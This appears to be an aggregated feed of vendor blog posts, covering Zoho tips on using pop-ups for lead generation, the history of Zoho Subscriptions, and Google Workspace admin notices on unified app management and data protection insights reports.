  • Conduct fun virtual activities that can help your employees relax.

Read more about these tips to improve remote communication in our HR Knowledge Hive.


9 pointers to make pop-ups an effective lead generation tool

This is a guest post by Abbey Claire Dela Cruz, Marketing Manager at Poptin.

Pop-ups vary in size and style. While creating them is incredibly easy, how you execute them makes all the difference. If done right, pop-ups can help you achieve great results with your lead generation strategies. They can engage with your target audience and usher them to your funnel until they’re ready to give you their email addresses.

Here are some of the most effective hacks to help you make pop-ups an effective lead generation tool.

1. Personalize your message

Want a surefire way to grab the attention of your visitors? Try personalizing your pop-ups. There are many different advanced targeting options that enable you to show a specific pop-up message to a certain audience, like for first-time visitors, or people from a specific country, traffic source, web page, and more.

2. Offer a lead magnet they can’t say no to

The value of your offer can make or break the effectiveness of your conversion funnel. Most successful businesses rely on lead magnets in exchange for visitors’ contact information. And most premium content that acts as a lead magnet on pop-ups is downloadable ebooks, free shipping, webinar slots, discounts, and coupon codes, among many other enticing offerings that can encourage sign-ups.

3. Make it easy for visitors to exit your pop-up

Without a clear exit method, your bounce rate will continue to spike, and next thing you know, you’re losing potential subscribers left and right.

4. Reduce friction and distractions

When creating your own pop-up, design it in a way that visitors can simply input their contact information with ease. If you include a lot of unnecessary fields, you can end up losing them along the way.

If you think every element of your design is important, run an A/B test to see how you can best optimize it for better performance and results.

5. Timing and location make all the difference

Pop-ups, if implemented correctly, can drive the best user browsing experience. However, if you do it wrong, expect to have a low conversion rate.

To overcome this, study your audience’s behavior and come up with a list of triggers to help you execute your pop-ups at the right time. Side by side with timing is the location. There are messages that you can just put on slide-ins, and then there are those that are most effective on a full-screen overlay.

6. Invest in visual elements

As the saying goes, a picture is worth a thousand words. A high-resolution image that encapsulates what your lead magnet is about will let visitors know in an instant what you want to offer them in return. Visual elements also allow them to perceive your brand’s tone and message without distraction.

Just make sure that your sign-up button is emphasized, and the call to action is as clear as day.

7. Show scarcity

According to the scarcity principle in social psychology, humans tend to value scarce things over abundant things.

With this in mind, emphasizing how limited your slots are can drive better results than just inviting them to a certain event. Moreover, inviting them to sign up to get sneak-peek updates on an upcoming sale can equally work in your favor.

8. Add urgency with a countdown timer

Potential clients don’t want to miss something they know they won’t have access to in the future. With this in mind, adding a sense of urgency through a countdown timer can help achieve faster conversions when you’re trying to gather leads.

9. Include social proof

Social proofs are considered a powerful persuasion technique to gain leads. They’re used to establish your credibility and reputation as a leader in the industry.

They are more prominent on websites and landing pages, but they can be also effective on pop-ups. For example, if you’re promoting an online course, include a nice testimonial from a previous student to encourage potential enrollees to also subscribe.

Start creating pop-ups with Poptin for Zoho CRM and learn to integrate your leads directly into your Zoho CRM account.


Work smarter by adding new capabilities to Zoho CRM with business solutions from Zoho Marketplace.


The post 9 pointers to make pop-ups an effective lead generation tool appeared first on Zoho Blog.


Streamlined and intuitive app management in the Admin console with new unified experience

What’s changing 

We’re creating a single place to manage web and mobile apps in the Admin console. With the new location, we’ll also be updating the management interface to be more consistent and intuitive. You’ll find this at Admin console > Apps > Web and mobile apps. There, you’ll be able to see configured apps, search apps, add apps, manage user access, adjust settings, and more for: 

You’ll no longer be able to manage apps in the previous locations. However, you’ll still manage the Android available apps and system apps settings in Admin console > Devices > Mobile settings

Who’s impacted 

Admins 

Why it’s important 

By reducing the locations you need to use to manage different categories of apps and creating simplified and consistent workflows, it will be quicker and simpler to manage app use and deployment for your organization. 

Additional details

New location for web and mobile apps:

New and consistent experience to add web and mobile apps:

Unified settings and quick controls to view access and manage apps:

Getting started 

  • Admins: Find the new app management location at Admin console > Apps > Web and mobile apps. Visit the Help Center to learn more about managing Android and iOS apps, and SAML apps for your organization. 
  • End users: No end user impact. 

Rollout pace 

Availability 

Mobile app management: 

  • Available to Business Plus; Enterprise; Education and Enterprise for Education; G Suite Basic and Business; and Nonprofits customers
  • Not available to Business Starter, Essentials, and Enterprise Essentials customers.

SAML app management: 

  • Available to Essentials, Business Starter, Business Standard, Business Plus, Enterprise Essentials, Enterprise Standard, Enterprise Plus, Education, Enterprise for Education, and Nonprofits customers

Resources 



Net Universe offers all Google devices with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/google.
You can visit our Shop Online

 

Zoho Subscriptions and Zoho’s Subscriptions

Zoho Subscriptions turned 6 recently, but we’ve been offering subscription-based products for much longer than that. So we thought this would be a good time to look back at how Zoho Subscriptions was born and take a moment to thank our customers for sticking with us.

Pioneering the model

Zoho has been offering subscription-based products for the better part of two decades now, starting when we first launched Zoho CRM in 2005.

The idea behind it was simple: offer customers a flexible way to pay for quality products, without making them feel like they’re tied down to a long-term contract.


As Zoho branched out and offered more products, the subscription model proved to be a success. We found ourselves one of very few companies offering cloud services with a broad product portfolio and an entirely subscription-based model.

As our volume of customers grew, we came to realize that our existing method of managing customers’ subscriptions couldn’t keep up. We needed a tool that could handle the complexities of recurring billing and subscription management at scale. Something that could cope with the varied pricing models of our multiple products, and something that could play well with our existing systems. 

Build vs. buy

It’s a classic question that every organization faces at some point. Do you set aside the resources to build your own solution, including a budget, work hours, and a dedicated team? Or do you skip the hassle and buy a pre-made solution instead?

There’s not always a simple answer to that question. If you choose to build, you run the risk of spending a lot of resources on a system that couldn’t deliver. If you choose to buy, you pay someone else to do the work of creating your solution…but the burden is on you to pick one that does what you need it to do.

At Zoho, we’re committed to solving this problem for both sides. That’s why we don’t make anything we don’t want to use ourselves. We use our own products, like Zoho Books for our accounting, Zoho People for HR management, and Zoho Cliq for internal communications–just to name a few.

So, following our usual strategy, we decided to build our own subscription management system. It just so happened that we had a decade’s worth of experience in the subscription industry to help us do so.

By 2013, Zoho was offering more than 20 products with a subscription-based pricing model. This gave us real-world experience of what was needed in a subscription management tool. We were all too familiar with pain points like add-on management, tier-based pricing, and consolidated reporting, and we wanted to solve them–for ourselves and for other businesses.

Our (and your) very own recurring billing tool

In 2014, we put that experience to good use and launched Zoho Subscriptions to help other businesses adopt a subscription-based model for themselves. At that time, the subscription industry boom was right around the corner and major players like Adobe were switching to a subscription-based model.

We built Zoho Subscriptions to be scalable, from its set-and-forget simplicity to its open REST APIs. We wanted it to work seamlessly with our existing upstream systems like Zoho CRM and downstream systems like Zoho Books, so this functionality was baked in. We didn’t stop there, though. We wanted Zoho Subscriptions to work out of the box for other businesses too, so we made sure it came with prebuilt integrations that make it easy for you to connect with payment gateways and other integrations to communicate with your existing systems.

This means smaller businesses without dedicated development teams can configure Zoho Subscriptions with a no-code approach, and larger businesses with their own resources can use Zoho Subscriptions’ APIs to integrate tightly with their own applications.

All of this customization came out of our realization that every business needs to make their subscription management software truly their own, whether they build or buy. When you can make your tools work exactly the way you need them to, build vs. buy doesn’t have to be a tough decision. Zoho Subscriptions can help you out.

Our commitment to customers

If you’ve been using Zoho Subscriptions, thank you! We wouldn’t be where we are right now without your support, and we’re committed to continuing to provide you with more great features that scale. Our team is hard at work to bring you the best subscription management experience, so you can look forward to major updates in the coming year.

As your business grows, Zoho Subscriptions will be right there with you.

We’d love to hear from you! Drop a comment below and let us know what you think about recurring billing and Zoho Subscriptions.


Introducing data protection insights reports

What’s changing 

We’re creating reports with recommendations that will help customers proactively understand and protect sensitive content. The reports will show: 

  • How many files in your organization contain sensitive information. 
  • How many sensitive files in your organization have been shared externally. 
  • Insights into the type of sensitive information (e.g. credit card numbers, social security numbers, etc.) in those files. 

Note that a report will be proactively generated for Business Standard, Business Plus, Enterprise Essentials, Enterprise Standard, and Enterprise Plus customers on a periodic basis. The reports do not require any Data Loss Prevention (DLP) rules to be set up in the Admin console. You can turn off the report by going to Admin console > Data Protection > Data protection insights.

An example of a Data Protection insight report 

Who’s impacted 

Admins 

Why it matters 

Protecting your company’s confidential data is critical. DLP supports this by giving you control over what users can share, and helps prevent the unintended exposure of sensitive information. 

These new reports will help you understand what sensitive information is stored in your organization, and can help you make more informed decisions to protect it. For customers new to DLP, a report can help you identify the types of sensitive content, such as credit card numbers and tax IDs, that you might want to prioritize establishing DLP policies for. For customers already using DLP, a report can help you identify data types that you may not have authored DLP policies for. 

Enterprise Standard and Enterprise Plus customers also have access to Google Workspace’s DLP systems, which can make it easier to implement chosen DLP policies and create alerts for ongoing monitoring of issues identified in the report. 

Getting started 

  • Admins: 
    • Reports will be produced periodically. When they’re created, links to the report will be sent by email, and an alert will be shown in the Admin console. You can also find the report in the Admin console at Security > Data protection
    • Reports will only be accessible by super admins and other admins with the View DLP rule privilege. 
    • You can turn off the report by going to Admin console > Data Protection > Data protection insights
    • Visit our Help Center to learn more about managing DLP insights reports.  
  • End users: No end user impact. 

An email which helps admins find and use the report 

Rollout pace 

Availability 

  • Available to Business Standard, Business Plus, Enterprise Essentials (domain verified), Enterprise Standard, and Enterprise Plus customers 
  • Not available to Essentials, Business Starter, Education, Enterprise for Education, and Nonprofits customers 

Resources 

Roadmap 


